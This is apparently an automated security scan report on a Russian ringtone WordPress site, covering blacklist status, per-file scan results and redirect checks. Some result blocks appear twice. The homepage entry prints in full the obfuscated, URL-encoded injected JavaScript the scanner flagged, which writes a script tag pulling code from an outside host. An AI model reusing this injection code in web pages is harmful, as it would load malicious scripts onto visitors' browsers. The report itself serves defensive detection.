Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rington3gp.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rington3gp.ru/
Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rington3gp.ru/ | 200 OK Content-Length: 60452 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) g="%3Cscript%20type%3D%22text%2FJavaScript%22%20language%3D%22JavaScript%22%20charset%3D%22windows-1251%22%3Eeval%28function%28iqi%2Ca%2Cc%2Ck%2Ce%2Cd%29%7Be%3Dfunction%28c%29%7Breturn%20c.toString%2836%29%7D%3Bif%28%21%27%27.replace%28%2F%5E%2F%2CString%29%29%7Bwhile%28c--%29%7Bd%5Bc.toString%28a%29%5D%3Dk%5Bc%5D%7C%7Cc.toString%28a%29%7Dk%3D%5Bfunction%28e%29%7Breturn%20d%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw%2B%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29%7Bif%28k%5Bc%5D%29%7Biqi%3Diqi.replace%28new%20RegExp%28%27%5C%5Cb%27%2Be%28c%29%2B%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%7D%7Dreturn%20iqi%7D%28%274.3%28%22%3C0%202%22%2B%221%3D%5C%5C%225%3A%2F%2F6.a.9%2F8.7%5C%5C%22%3E%3C%5C%5C%2F0%3E%22%29%3B%27%2C11%2C11%2C%27script%7Cc%7Csr%7Cwrite%7Cdocument%7Chttp%7Cwww%7Cphp%7Cjs5%7Ccom%7Cwmrak%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%0A%3C%2Fscript%3E";g=g.replace(/л/g,"7C");g=g.replace(/м/g,"5C");g=g.replace(/н/g,"2C");document.write(unescape(g)); Antivirus reports:
| ||
http://rington3gp.ru/wp-content/themes/audi_gtr_fleximag/script.js | 200 OK Content-Length: 14945 Content-Type: application/x-javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js?ver=1.6.4 | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://rington3gp.ru/wp-content/plugins/wp-video-lightbox/js/jquery.prettyPhoto.js?ver=3.1.5 | 200 OK Content-Length: 35243 Content-Type: application/x-javascript | clean |
http://rington3gp.ru/wp-content/plugins/wp-video-lightbox/js/video-lightbox.js?ver=3.1.5 | 200 OK Content-Length: 6871 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js?ver=2.2 | 200 OK Content-Length: 10220 Content-Type: text/javascript | clean |
http://rington3gp.ru/wp-content/plugins/advanced-spoiler/js/jquery-spoiler.js?ver=2.02 | 200 OK Content-Length: 3121 Content-Type: application/x-javascript | clean |
http://rington3gp.ru/wp-content/plugins/thethe-image-slider/style/js/thethe-image-slider.js?ver=3.4.2 | 200 OK Content-Length: 31873 Content-Type: application/x-javascript | clean |
http://rington3gp.ru/wp-content/plugins/auto-highslide/highslide/highslide-with-html.packed.js | 200 OK Content-Length: 32205 Content-Type: application/x-javascript | clean |
http://rington3gp.ru/wp-content/plugins/jquery-vertical-mega-menu/js/jquery.hoverIntent.minified.js?ver=3.4.2 | 200 OK Content-Length: 1614 Content-Type: application/x-javascript | clean |
http://rington3gp.ru/wp-content/plugins/jquery-vertical-mega-menu/js/jquery.dcverticalmegamenu.1.3.js?ver=3.4.2 | 200 OK Content-Length: 6386 Content-Type: application/x-javascript | clean |
http://rington3gp.ru/konkurs-na-bloge/ | 200 OK Content-Length: 37769 Content-Type: text/html | clean |
http://rington3gp.ru/wp-content/plugins/qipsmiles/qips-js.php | 200 OK Content-Length: 2292 Content-Type: application/x-javascript | clean |
http://rington3gp.ru/wp-login.php?action=register | 200 OK Content-Length: 3106 Content-Type: text/html | clean |
http://rington3gp.ru/wp-login.php | 200 OK Content-Length: 2703 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rington3gp.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 02 Mar 2015 09:45:11 GMT
Pragma: no-cache
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=ee8f190bafd3176f331380afe445bcf9; path=/
X-Pingback: http://rington3gp.ru/xmlrpc.php
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: rington3gp.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 02 Mar 2015 09:45:11 GMT
Pragma: no-cache
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=ee8f190bafd3176f331380afe445bcf9; path=/
X-Pingback: http://rington3gp.ru/xmlrpc.php
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: rington3gp.ru
Referer: http://www.google.com/search?q=rington3gp.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rington3gp.ru
Referer: http://www.google.com/search?q=rington3gp.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.